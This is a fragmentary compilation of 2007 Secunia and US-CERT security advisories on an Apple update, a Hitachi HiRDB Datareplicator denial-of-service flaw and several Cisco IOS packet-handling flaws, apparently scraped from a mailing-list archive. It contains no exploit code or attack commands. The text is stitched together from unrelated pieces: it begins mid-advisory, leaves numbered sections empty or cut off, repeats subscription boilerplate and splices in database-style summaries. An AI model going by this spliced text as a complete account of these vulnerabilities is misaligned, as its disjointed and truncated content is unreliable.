Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . I. Further details are available in the related vulnerability notes. II. Impact The impacts of these vulnerabilities vary. Potential consequences include remote execution of arbitrary code or commands, bypass of security restrictions, and denial of service. III. This and other updates are available via Apple Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA07-319A Feedback VU#498105" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History November 15, 2007: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRzx7ZvRFkHkM87XOAQJfIQgAmTZfjJAY/QTweUmvZtOJ9JQ4e/Gj0sE9 OPSrK/SplP92WUL1Ucb8I/VUSQEXXJhNv9dTCMcy7IMpqhx4UxPA6fBKWDJ+nUFi sx/60EOAiIVW+yYK79VdoI1jrSs48E+CNdqEJCQcjUCVi29eGAdW63H2jOZV37/F 4iQBZYRqhiycZ9FS+S+9aRfMhfy8dEOr1UwIElq6X/tSwss1EKFSNrK5ktGifUtB AJ+LJVBt2yZOIApcGhsxC3LYUDrDfhqGLIVM2XBc1yuV7Y2gaH4g9Txe+fWK79X2 LYHvhv2xtgLweR12YC+0hT60wSdrDTM6ZW0//ny25LZ7Y7D46ogSWQ== =AgEr -----END PGP SIGNATURE-----

Hitachi HiRDB Datareplicator 7HiRDB, 7(64), 6, 6(64), 5.0, and 5.0(64); and various products that bundle HiRDB Datareplicator; allows attackers to cause a denial of service (CPU consumption) via certain data. Hitachi HiRDB Datareplicator is prone to a remote denial-of-service vulnerability. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Hitachi HiRDB DataReplicator Denial of Service Vulnerability SECUNIA ADVISORY ID: SA23816 VERIFY ADVISORY: http://secunia.com/advisories/23816/ CRITICAL: Less critical IMPACT: DoS WHERE: >From local network SOFTWARE: Hitachi HiRDB DataReplicator 5.x http://secunia.com/product/13320/ http://secunia.com/product// Hitachi HiRDB DataReplicator 6.x http://secunia.com/product/13318/ http://secunia.com/product// Hitachi HiRDB DataReplicator 7.x http://secunia.com/product/13316/ http://secunia.com/product// DESCRIPTION: A vulnerability has been reported in Hitachi HiRDB DataReplicator, which can be exploited by malicious people to cause a DoS (Denial of Service). See the vendor advisory for a matrix of affected versions. SOLUTION: Updates are available for some versions (see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.hitachi-support.com/security_e/vuls_e/HS06-023_e/01-e.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Memory leak in the TCP listener in Cisco IOS 9.x, 10.x, 11.x, and 12.x allows remote attackers to cause a denial of service by sending crafted TCP traffic to an IPv4 address on the IOS device. Cisco IOS fails to properly process IPv6 packets with specially crafted routing headers. Successful exploitation of this vulnerability may allow an attacker to execute code, or create a denial-of-service condition. The Cisco IOS Transmission Control Protocol listener contains a memory leak. CISCO IOS is prone to a denial-of-service vulnerability. This issue affects only devices running the Internet Protocol version 4 (IPv4). Attackers can exploit this issue to cause memory leaks, potentially causing memory exhaustion over time. This will result in denial-of-service conditions. This issue affects all CISCO routers using CISCO IOS Software versions 9 through 12.4. This issue is being tracked by the CISCO Bug ID: CSCek37177. Please note that the attacker can trigger this vulnerability without completing the TCP triple handshake, so TCP packets with forged source addresses can also complete the attack. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-024A Cisco IOS is Affected by Multiple Vulnerabilities Original release date: January 24, 2007 Last revised: -- Source: US-CERT Systems Affected * Cisco network devices running IOS in various configurations Overview Several vulnerabilities have been discovered in Cisco's Internet Operating System (IOS). I. II. Impact Although the resulting impacts of these three vulnerabilities is slightly different, in the case of VU#341288 and VU#274760, a remote attacker could cause an affected device to reload the operating system. In some cases, this creates a secondary denial-of-service condition because packets are not forwarded through the affected device while it is reloading. Because devices running IOS may transmit traffic for a number of other networks, the secondary impacts of a denial of service may be severe. III. Please refer to the "Software Versions and Fixes" sections of the Cisco Security Advisories listed in the References section of this document for more information on upgrading. Workaround Cisco has also published practical workarounds for these vulnerabilities. Please refer to the "Workarounds" section of each Cisco Security Advisory listed in the References section of this document for more information. Sites that are unable to install an upgraded version of IOS are encouraged to implement these workarounds. IV. References * US-CERT Vulnerability Note VU#217912 - <http://www.kb.cert.org/vuls/id/217912> * US-CERT Vulnerability Note VU#341288 - <http://www.kb.cert.org/vuls/id/341288> * US-CERT Vulnerability Note VU#274760 - <http://www.kb.cert.org/vuls/id/274760> * Cisco Security Advisory: Crafted TCP Packet Can Cause Denial of Service - <http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tc p.shtml> * Cisco Security Advisory: Crafted IP Option Vulnerability - <http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip -option.shtml> * Cisco Security Advisory: Cisco Security Advisory: IPv6 Routing Header Vulnerability - <http://www.cisco.com/warp/public/707/cisco-sa-20070124-IOS-IPv6.s html> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-024A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-024A Feedback VU#217912" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History January 24, 2007: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRbf06exOF3G+ig+rAQJOzgf/X7hyKuQsU4r7KzPU9K9VyX0KFFI0Yjzi 9sg630Mg2xZ+H93LSa/sTQKOYn2iDNxi6cf5cuFnbomH7ZkAvkiU5EjOseM0NrWI DGeomQJUL7zVCKf8vOMeRK4pvItSbzC9j0VWLFYVESkQOIgTEOy5fJcWeCVI/+Qp Wafo/HVcEprAbeH8E0xoOhVJxvKhC452WlE8fTYtPMJh/zUiEy1Nnovc/q056rus vYfziC1gxyxO/YvwKwwBDH6jSFMxcmcZrUhNy1ITwTNJmedCMtFyq9R2rTw5p6ry e1xukv37h3eeLgOqBPFlC7hbOo80mLvAQmZ1NOHKEZBbMEwT/DC5dA== =j9yu -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. 1) An error exists in the processing of IP options in various IP packets (including some ICMP requests, PIMv2, PGM, and URD requests). SOLUTION: Update to the latest version (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: 1) Reported by the vendor. 2) Reported by the vendor. 3) Arnaud Ebalard, EADS Corporate Research Center. ORIGINAL ADVISORY: Cisco Systems: http://www.cisco.com/warp/public/707/cisco-sa-20070124-bundle.shtml http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml http://www.cisco.com/warp/public/707/cisco-sa-20070124-IOS-IPv6.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------